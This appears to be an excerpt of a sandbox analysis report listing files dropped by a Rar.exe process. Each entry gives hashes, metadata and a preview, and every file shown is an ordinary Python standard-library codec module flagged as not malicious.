                                                                                                                                                                                      SSDEEP:24:JwEFOXxVaniSdZSHvcGWQvnNq1I5atMufnb+s0ktzE9ZKj94JxFplR:JwEWxVaniSvIvdvNq1I5aCuzbztzETK2
                                                                                                                                                                                      MD5:0D4DEB48618561417DDE714ACF399AA3
                                                                                                                                                                                      SHA1:F617D8FC1B17AEC713947CDEE9BA302B4B2E71B1
                                                                                                                                                                                      SHA-256:B00887A6D93C97D320CBB1C3379BD7C6DE767CCFC34ED13442891E06CC62F148
                                                                                                                                                                                      SHA-512:722C9182DEAF8A8A65550EF86F967A559105BE6EB61C9FB3244521D51649B8A2B901E911A28FBB0CC42F1E680ACD0FC64B475E53DEE921287010EE112D982630
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python 'mbcs' Codec for Windows......Cloned by Mark Hammond (mhammond@skippinet.com.au) from ascii.py,..which was written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..# Import them explicitly to cause an ImportError..# on non-Windows systems..from codecs import mbcs_encode, mbcs_decode..# for IncrementalDecoder, IncrementalEncoder, .....import codecs....### Codec APIs....encode = mbcs_encode....def decode(input, errors='strict'):.. return mbcs_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return mbcs_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = mbcs_decode....class StreamWriter(codecs.StreamWriter):.. encode = mbcs_encode....class StreamReader(codecs.StreamReader):.. decode = mbcs_decode....### encodings module API....def getregentry():.. return codecs
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1060
                                                                                                                                                                                      Entropy (8bit):4.538507695911449
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:JkZSHvcGW6pjvneEq1IhhatMufko3b+00kwWzu9ZKj9wJxFplR:JSIvvBvPq1IhhaCu8M1zPzuTKiJxTz
                                                                                                                                                                                      MD5:5163EF7B87B6DEE11BC7914E2AB1FF8E
                                                                                                                                                                                      SHA1:92EB877FD4F77A40FC6745717139D4E335670613
                                                                                                                                                                                      SHA-256:991D1FD2F4B815943EAE7F7BFA9F87E2DE980ACB08932BEA3258FB034902A15F
                                                                                                                                                                                      SHA-512:99458C11DB86287A818176588DEBD76AD18401557B7D49F01FCFA85C917947CDADC310DEF539434824997922CB24005853751920EAE103B0DB04A83AB3A49E46
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python 'oem' Codec for Windows...."""..# Import them explicitly to cause an ImportError..# on non-Windows systems..from codecs import oem_encode, oem_decode..# for IncrementalDecoder, IncrementalEncoder, .....import codecs....### Codec APIs....encode = oem_encode....def decode(input, errors='strict'):.. return oem_decode(input, errors, True)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return oem_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. _buffer_decode = oem_decode....class StreamWriter(codecs.StreamWriter):.. encode = oem_encode....class StreamReader(codecs.StreamReader):.. decode = oem_decode....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='oem',.. encode=encode,.. decode=decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreade
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13827
                                                                                                                                                                                      Entropy (8bit):4.583791210166393
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:7hsuOTDvR1UrXPLouhIAs2+iXIcDCYBZt6CJTd12:mTDuhIAlX9Zt680
                                                                                                                                                                                      MD5:3D512E1AB4D97E95DCEE526F991E685F
                                                                                                                                                                                      SHA1:0349C9649CC54002699DD48E80DA09DDC21F9432
                                                                                                                                                                                      SHA-256:C9E5D71C1FA128602E2D10E9BED0B271132DF349290F4465CFCA9D5DAA5BA86C
                                                                                                                                                                                      SHA-512:DB6CE7BF928D829175D54328A6A37F1A8B691B04CEF1C76CE0C98B6B2C21959DF7BCA822416BFF39C2530E93F8B15CCB55E480FD1187C6258734923A10CF9878
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec for PalmOS 3.5.....Written by Sjoerd Mullender (sjoerd@acm.org); based on iso8859_15.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.. def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='palmos',..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14327
                                                                                                                                                                                      Entropy (8bit):4.653952382312946
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:63hsuOTDvRmUrXPLouhIAs2+iRQCzJHDCYbtlqtEDp+/:ZTsuhIAlXzJHftlqtEo/
                                                                                                                                                                                      MD5:6EE7970BA64A9E17B3246A28C7CECD28
                                                                                                                                                                                      SHA1:6B56118465C3E53A7E6C0BECE694E3643B485FC0
                                                                                                                                                                                      SHA-256:F3BDA3C1415D37DD1C314E3F474529913F36F7021279D82DED0D11154EED55F2
                                                                                                                                                                                      SHA-512:FAA196E1B4CCEEB771F9EC19E528696B35EAD5AC6CF1EF53DA092F75DB701FB59DBBA7FACEF3F169BC4D6DBF9336D250E0F4B9DFEE9EF2DCAD32C0FAD31C8A93
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec generated from 'PTCP154.txt' with gencodec.py.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY...(c) Copyright 2000 Guido van Rossum....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7120
                                                                                                                                                                                      Entropy (8bit):4.519199483696464
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:l3Dt9EqNFDPf3rBEX2M+4lCQ57+K6AWujvRI3:lRSO/SLV5SZ
                                                                                                                                                                                      MD5:DB14BE3F7A2ADCBCC07E2A32AD0A7198
                                                                                                                                                                                      SHA1:A4F5C43558E47C3F89EB807FEFB2F49119D51B75
                                                                                                                                                                                      SHA-256:823D1424AFA9508EA425F667F787567C80A6A28AE9742C66AA90A829ACC19748
                                                                                                                                                                                      SHA-512:5D572DF2302FF9F74BB4E5F884F8057CDEDFB7BC6C53E82809627BD982104CB42A595B3001C8B65E5C087E94CBEDBC088951ED0EBF0D3AE3C4D88823F3C89BA6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Codec for the Punicode encoding, as specified in RFC 3492....Written by Martin v. L.wis..."""....import codecs....##################### Encoding #####################################....def segregate(str):.. """3.1 Basic code point segregation""".. base = bytearray().. extended = set().. for c in str:.. if ord(c) < 128:.. base.append(ord(c)).. else:.. extended.add(c).. extended = sorted(extended).. return bytes(base), extended....def selective_len(str, max):.. """Return the length of str, considering only characters below max.""".. res = 0.. for c in str:.. if ord(c) < max:.. res += 1.. return res....def selective_find(str, char, index, pos):.. """Return a pair (index, pos), indicating the next occurrence of.. char in str. index is the position of the character considering.. only ordinals up to and including char, and pos is the position in.. the full string. index/pos is the starting p
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1581
                                                                                                                                                                                      Entropy (8bit):4.656023184812778
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:5UeC1AIc1eq1AIrZ1+A1+0uwY+vIvBTKXgCJxHjH:5Uj7c1P7rZdBu6AJTKVrH
                                                                                                                                                                                      MD5:096A80038FB883522A68E9E6C434C6A6
                                                                                                                                                                                      SHA1:3FAFAD17359B000B8A417446E15D69EEE44A10B2
                                                                                                                                                                                      SHA-256:4BF9A405B6F2359E5B931E0D9FB9BD9609B013688CE2E58AEBBD9BFCB119A356
                                                                                                                                                                                      SHA-512:8088AE700A1C85C55BA10FE47EEC68193497DDC5145069C48D258604273F284F46A42D5F83D43D826A2C11CB1E71692A0D4D15005D63800F072DD883BA7890BB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Codec for quoted-printable encoding.....This codec de/encodes from bytes to bytes..."""....import codecs..import quopri..from io import BytesIO....def quopri_encode(input, errors='strict'):.. assert errors == 'strict'.. f = BytesIO(input).. g = BytesIO().. quopri.encode(f, g, quotetabs=True).. return (g.getvalue(), len(input))....def quopri_decode(input, errors='strict'):.. assert errors == 'strict'.. f = BytesIO(input).. g = BytesIO().. quopri.decode(f, g).. return (g.getvalue(), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return quopri_encode(input, errors).. def decode(self, input, errors='strict'):.. return quopri_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return quopri_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1378
                                                                                                                                                                                      Entropy (8bit):4.688171660474759
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:JKmSEHV0yWfBx1yWfB8MufQfBxCb+nh5fBiiUQWSJzWSmi1GfBX9ZKj9UnQJxlTt:JVST31u0WMp6SJ6SL1CBTKanQJxHf
                                                                                                                                                                                      MD5:7B4C09E92D59EF6722DFCB9C79B792A7
                                                                                                                                                                                      SHA1:F413714763D5BC134CE873FEB69A4D79735C381B
                                                                                                                                                                                      SHA-256:2CC24FFC2D06CAB80423ADA94E3DFFC02C010346E17EFC2FFFE86825A6E07808
                                                                                                                                                                                      SHA-512:9584CF7FDC438C9E1D00CA3387A3F8AF103B3DDB41A65768131ACC5F3E7D40AF180D1991EF613451B2736E20D963BD2EC08F48106C15146134C8A42BB6A64D3A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python 'raw-unicode-escape' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.raw_unicode_escape_encode.. decode = codecs.raw_unicode_escape_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.raw_unicode_escape_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. def _buffer_decode(self, input, errors, final):.. return codecs.raw_unicode_escape_decode(input, errors, final)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. def decode(self, input, errors='strict'):.. return codecs.raw_unicode_escape_dec
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2561
                                                                                                                                                                                      Entropy (8bit):4.800734764439435
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:7Hk1rNJm1rNJbuvNJTNJi6SJ6S0TK/JxHjRohn3xrUAosYDYKQyaDl:7EvJmvJbu1JRJivCTK/rSh1U8eSyol
                                                                                                                                                                                      MD5:15F4EDEE2C94C2FB2F07435332C7A25A
                                                                                                                                                                                      SHA1:D110DE2410DE8170389F26082E79C33EA643C991
                                                                                                                                                                                      SHA-256:DC6052650356095A92A8CB3A6C63300B7F51A63B6CD3B6F636350B5F22CDA32A
                                                                                                                                                                                      SHA-512:B9A21BB0C6AF53193088CAAF45FD94AAC472FD87927281198D88E70DE07F5D938CCAE2D081D737DEA9C6D11ACB53DCF1E2E855B464DA9871B99D522692492EBD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#!/usr/bin/env python..""" Python Character Mapping Codec for ROT13.....This codec de/encodes from str to str.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs....### Codec APIs....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return (str.translate(input, rot13_map), len(input)).... def decode(self, input, errors='strict'):.. return (str.translate(input, rot13_map), len(input))....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return str.translate(input, rot13_map)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return str.translate(input, rot13_map)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='rot-13',.. encode=Codec().encod
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1078
                                                                                                                                                                                      Entropy (8bit):4.563549974626686
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:n5SqSOzff/XokKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9RcJxFplR:5Sqfwm62VJjRU8njOxLnrxLbrLKUJxTz
                                                                                                                                                                                      MD5:9C02A2E9711192F5738426F6E7285B5C
                                                                                                                                                                                      SHA1:6AF9532F9C07B806DBA9D248A17E14B3EE637B1C
                                                                                                                                                                                      SHA-256:195C87BF032904002D5ADB51C256AE14D99F4A69FFC15C989CA34DD51FC203D7
                                                                                                                                                                                      SHA-512:3607DA04E5A83C27B8F6F3223872BF7957B58EA8326E19ECEB6A5836DD4E35B1A27CF43BBB4250E0CF0B931BB4BBEF6290FB6D30BEF407CC8C137277DBEB85D2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# shift_jis.py: Python Unicode Codec for SHIFT_JIS..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jis')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jis',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1098
                                                                                                                                                                                      Entropy (8bit):4.636186915032078
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:njqMsOzff/XoRKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ocJxFplR:jqkwF62VJjRU8njOxLnrxLbrLKHJxTz
                                                                                                                                                                                      MD5:0440951B33F486E65DB5176D5CF99851
                                                                                                                                                                                      SHA1:D6269777856EC9BB88F7A0413A55EBCCE3BFBE17
                                                                                                                                                                                      SHA-256:B806ADF317A9920E69A1DEB14C7F078F0D5A9BD26BD370C89492F4DD296AA52A
                                                                                                                                                                                      SHA-512:A92FF2A9EB64C6E42E4CB808823E1B88CD760EC83EAB27BDAAB974152FB2B8DDC2288F800BE85A622F79304DADFD7E96DDEF86FED3434B73CC53967F873BBCEA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# shift_jis_2004.py: Python Unicode Codec for SHIFT_JIS_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jis_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jis_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=In
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1098
                                                                                                                                                                                      Entropy (8bit):4.656971526890629
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:nAqqOzff/Xo2KyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9PcJxFplR:AqHw462VJjRU8njOxLnrxLbrLKCJxTz
                                                                                                                                                                                      MD5:CBAB0DA456CE49672F8A5CDB79018312
                                                                                                                                                                                      SHA1:A682827169185DA5BBA2B498BF0302B2EAE087A7
                                                                                                                                                                                      SHA-256:16BE3CDC9EFA7C3A6EC5A683BC03BCAA9DBB41FCC70C92900130175A761A9D62
                                                                                                                                                                                      SHA-512:EFE6CF1021E7FEEF474A3C0E0B346515410716DA6536488765803F2DBD1DA2A217F23F64484634C8EDDC149086F1AD82D563EB9A7C6319976FB852747CCCCF9D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#..# shift_jisx0213.py: Python Unicode Codec for SHIFT_JISX0213..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_jp, codecs..import _multibytecodec as mbc....codec = _codecs_jp.getcodec('shift_jisx0213')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='shift_jisx0213',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=In
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12607
                                                                                                                                                                                      Entropy (8bit):4.621772981576072
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:WHhsuOTDvR2LUrXPLouhIAs2+ijLf00pC8i5I:zTojuhIAl0H8iG
                                                                                                                                                                                      MD5:D9690A0F4A8779777A17C8E04C5EA6FF
                                                                                                                                                                                      SHA1:F10E74D2FDC0BE0582B97094F50BF4A38320C6FA
                                                                                                                                                                                      SHA-256:18AFE3A0FD28797D71762EAFFADC9822E0CB8832BE696AF2298F6727AB92627F
                                                                                                                                                                                      SHA-512:48AEBA9D13106BECC3305F42FB4C0A9B9D3A5663C807C7B42FAC579229D9FD43E2F15BBE3AA9DB6C19216334F296D584308BB12D93C4D998D0AF607ABB621BAA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python Character Mapping Codec tis_620 generated from 'python-mappings/TIS-620.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='tis-620',.. encode=Cod
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1348
                                                                                                                                                                                      Entropy (8bit):4.667992147176458
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:JldJcg5qSEH6e1cUe2e1cUeFMufKUeFhKUemUQWSJzWS09ZKj9EmIcJxlTpf:JldJ9ISo1ner1neKuhe5em6SJ6S0TK2M
                                                                                                                                                                                      MD5:7C6EF4AB65DA0214127F4E70CB74D180
                                                                                                                                                                                      SHA1:01D2D4FAE5C7C55DDD33CE3D5DB95BC56EA68E03
                                                                                                                                                                                      SHA-256:E882AD26197F05AFB20980407787F77D18E234F562E6EC396B7D9DF3C7EEF5FC
                                                                                                                                                                                      SHA-512:2DEC757B249BEC760DA00B5269D51C2F7ADEF574FD68A188B64304EB1B7974C84E0B4AB89A138764203D89231DFE76AA4784C466B384655B26D510FA58522E7E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python 'undefined' Codec.... This codec will always raise a ValueError exception when being.. used. It is intended for use by the site.py file to switch off.. automatic string to Unicode coercion.....Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. raise UnicodeError("undefined encoding").... def decode(self,input,errors='strict'):.. raise UnicodeError("undefined encoding")....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. raise UnicodeError("undefined encoding")....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. raise UnicodeError("undefined encoding")....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1350
                                                                                                                                                                                      Entropy (8bit):4.660145850496412
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:JDmSEHV0yWcBx1yWcB8MufQcBxCb+nh5cBiiUQWSJzWSmi1GcBX9ZKj9jQJxlTpf:JaSAE1uzWbp6SJ6SL1tBTKpQJxHf
                                                                                                                                                                                      MD5:C939A021963EDD01807CDF57B08163D7
                                                                                                                                                                                      SHA1:5549D399865582B0A802D950E8B3B7FA4474D726
                                                                                                                                                                                      SHA-256:1D1372CF4F46E2F99820070B78563BD3EEED60FFC43A932B483CC7918F3DA5E9
                                                                                                                                                                                      SHA-512:8BF2450C2A44B4ED7B9E901C425AD7BA114E9B946E69FF0DB36644DBD82BF85266EB487C373179F50DB983CE0A51A03E52F43539F92DBC9BF69D39F5DBAE7753
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""" Python 'unicode-escape' Codec......Written by Marc-Andre Lemburg (mal@lemburg.com).....(c) Copyright CNRI, All Rights Reserved. NO WARRANTY....."""..import codecs....### Codec APIs....class Codec(codecs.Codec):.... # Note: Binding these as C functions will result in the class not.. # converting them to methods. This is intended... encode = codecs.unicode_escape_encode.. decode = codecs.unicode_escape_decode....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.unicode_escape_encode(input, self.errors)[0]....class IncrementalDecoder(codecs.BufferedIncrementalDecoder):.. def _buffer_decode(self, input, errors, final):.. return codecs.unicode_escape_decode(input, errors, final)....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. def decode(self, input, errors='strict'):.. return codecs.unicode_escape_decode(input, errors, False
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5391
                                                                                                                                                                                      Entropy (8bit):4.3113332789517
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:JgcgiEqCubuY5lRlE2GRCGEFdIXv5lLoQyLt6ofvBUpzdft0iL7+9WiV9lkip8IB:aruCouolRaRCRIhlL7yLt7vYfLL72blt
                                                                                                                                                                                      MD5:2867E58C229EB66CE2FC8704F1E380D2
                                                                                                                                                                                      SHA1:57CB01EF3A3CD16BCCB814C86A3B6DABC379B7C4
                                                                                                                                                                                      SHA-256:FD85A9D634B6F3868D6777E2B0367643571B3E61111B87C79F65DF3F57C7ACB3
                                                                                                                                                                                      SHA-512:7E08E1F9FFCF68123DA6B5B531ED0040AE652FC00DCCEAFCD2B4AF121CA627ECF7A4F9DC6AEB44EF8C040414F27BB3AC0B31FAB030A7BB6D5C2491CA5161CC12
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
